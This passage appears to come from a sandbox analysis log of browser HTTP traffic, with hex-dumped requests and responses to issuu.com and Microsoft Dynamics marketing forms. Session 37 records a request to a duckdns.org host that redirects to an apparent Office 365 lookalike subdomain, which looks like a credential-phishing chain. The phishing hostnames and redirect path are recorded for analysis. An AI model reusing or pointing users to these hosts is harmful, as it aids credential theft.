                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.44981535.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:57 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:57 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:58 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:58 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.44982652.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:02 UTC605OUTOPTIONS /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29/visits HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          Accept: */*
                                                                                                          Access-Control-Request-Method: POST
                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                          Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:02 UTC383INHTTP/1.1 204 No Content
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:02 GMT
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Headers: content-type
                                                                                                          Access-Control-Allow-Methods: GET,POST
                                                                                                          Access-Control-Allow-Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          x-ms-trace-id: 6c98f140062ebc7b33bc7c9dd5801468
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.44982852.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:04 UTC715OUTPOST /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29/visits HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 153
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          Accept: application/json
                                                                                                          Content-Type: application/json
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:04 UTC153OUTData Raw: 7b 22 70 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2d 65 75 72 2e 6d 6b 74 2e 64 79 6e 61 6d 69 63 73 2e 63 6f 6d 2f 32 65 32 30 62 64 66 34 2d 61 63 62 36 2d 65 66 31 31 2d 38 61 36 36 2d 30 30 30 64 33 61 33 61 30 39 35 31 2f 64 69 67 69 74 61 6c 61 73 73 65 74 73 2f 73 74 61 6e 64 61 6c 6f 6e 65 66 6f 72 6d 73 2f 61 66 64 36 38 33 61 38 2d 37 62 62 63 2d 65 66 31 31 2d 62 38 65 39 2d 30 30 30 64 33 61 34 33 63 66 32 39 22 7d
                                                                                                          Data Ascii: {"pageUrl":"https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29"}
                                                                                                          2024-12-24 19:57:05 UTC366INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:05 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          x-ms-trace-id: a10cfe7cbe0c46eca6deb0981929e84c
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff
                                                                                                          2024-12-24 19:57:05 UTC54INData Raw: 32 62 0d 0a 7b 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 75 73 22 3a 30 2c 22 65 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 6e 75 6c 6c 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 2b{"interactionStatus":0,"errorMessage":null}0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.44982952.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:07 UTC468OUTGET /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29/visits HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:08 UTC218INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:07 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          x-ms-trace-id: 7341764c30c37ff762c6cb512922ba62
                                                                                                          Strict-Transport-Security: max-age=2592000; preload


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.44983135.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:08 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 682
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:57:08 UTC682OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:57:09 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:57:08 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.44984452.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:13 UTC598OUTOPTIONS /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          Accept: */*
                                                                                                          Access-Control-Request-Method: POST
                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                          Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:14 UTC383INHTTP/1.1 204 No Content
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:14 GMT
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Headers: content-type
                                                                                                          Access-Control-Allow-Methods: GET,POST
                                                                                                          Access-Control-Allow-Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          x-ms-trace-id: 60c537404f848f154ca320dc74da1286
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.44984635.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:14 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:57:14 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:57:14 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:57:14 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.44984752.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:16 UTC708OUTPOST /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 174
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          Accept: application/json
                                                                                                          Content-Type: application/json
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:16 UTC174OUTData Raw: 7b 22 70 75 62 6c 69 73 68 65 64 46 6f 72 6d 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2d 65 75 72 2e 6d 6b 74 2e 64 79 6e 61 6d 69 63 73 2e 63 6f 6d 2f 32 65 32 30 62 64 66 34 2d 61 63 62 36 2d 65 66 31 31 2d 38 61 36 36 2d 30 30 30 64 33 61 33 61 30 39 35 31 2f 64 69 67 69 74 61 6c 61 73 73 65 74 73 2f 73 74 61 6e 64 61 6c 6f 6e 65 66 6f 72 6d 73 2f 61 66 64 36 38 33 61 38 2d 37 62 62 63 2d 65 66 31 31 2d 62 38 65 39 2d 30 30 30 64 33 61 34 33 63 66 32 39 22 2c 22 66 69 65 6c 64 73 22 3a 5b 5d 7d
                                                                                                          Data Ascii: {"publishedFormUrl":"https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29","fields":[]}
                                                                                                          2024-12-24 19:57:16 UTC366INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:16 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: https://assets-eur.mkt.dynamics.com
                                                                                                          x-ms-trace-id: 1ed38833efb599712a6c8c8def8968ed
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff
                                                                                                          2024-12-24 19:57:16 UTC53INData Raw: 32 61 0d 0a 7b 22 73 75 62 6d 69 73 73 69 6f 6e 53 74 61 74 75 73 22 3a 30 2c 22 65 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 6e 75 6c 6c 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 2a{"submissionStatus":0,"errorMessage":null}0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.44985920.117.200.1914435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:18 UTC701OUTGET /hJEchGjd HTTP/1.1
                                                                                                          Host: officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:19 UTC20INHTTP/1.1 302 Found
                                                                                                          2024-12-24 19:57:19 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                          Data Ascii: Cache-Control: no-cache, no-store
                                                                                                          2024-12-24 19:57:19 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                          Data Ascii: Connection: close
                                                                                                          2024-12-24 19:57:19 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                                                                          Data Ascii: Content-Type: text/html
                                                                                                          2024-12-24 19:57:19 UTC73INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6f 33 36 35 2e 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 0d 0a
                                                                                                          Data Ascii: Location: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/
                                                                                                          2024-12-24 19:57:19 UTC191INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 66 65 63 34 2d 66 65 36 62 3d 38 32 65 38 63 63 36 37 33 32 32 30 63 33 66 34 66 63 61 62 66 37 31 65 66 33 64 33 32 33 32 34 32 32 37 32 63 35 65 61 34 65 64 64 62 31 64 36 61 65 64 64 36 32 35 38 66 39 63 63 34 63 64 61 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 63 65 63 63 64 79 72 73 76 68 68 79 6d 66 64 77 6e 66 77 67 68 68 62 70 78 70 72 71 73 62 79 6a 73 79 74 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 34 20 44 65 63 20 32 30 32 34 20 32 30 3a 35 37 3a 31 39 20 47 4d 54 0d 0a
                                                                                                          Data Ascii: Set-Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; Path=/; Domain=ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org; Expires=Tue, 24 Dec 2024 20:57:19 GMT
                                                                                                          2024-12-24 19:57:19 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:57:19 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:
                                                                                                          2024-12-24 19:57:19 UTC3INData Raw: 30 0d 0a
                                                                                                          Data Ascii: 0
                                                                                                          2024-12-24 19:57:19 UTC2INData Raw: 0d 0a
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.44985852.146.128.2404435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:57:18 UTC461OUTGET /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1
                                                                                                          Host: public-eur.mkt.dynamics.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:57:19 UTC300INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:57:19 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          x-ms-trace-id: fbbe1c15943ac8224212a6bbed26e1bd
                                                                                                          Strict-Transport-Security: max-age=2592000; preload
                                                                                                          x-content-type-options: nosniff
                                                                                                          2024-12-24 19:57:19 UTC16084INData Raw: 66 33 35 0d 0a 7b 22 66 6f 72 6d 52 65 6e 64 65 72 69 6e 67 53 74 61 74 75 73 22 3a 30 2c 22 66 6f 72 6d 48 74 6d 6c 22 3a 22 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 5c 6e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 5c 22 76 69 65 77 70 6f 72 74 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 5c
                                                                                                          Data Ascii: f35{"formRenderingStatus":0,"formHtml":"<!DOCTYPE html><html><head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <link rel=\
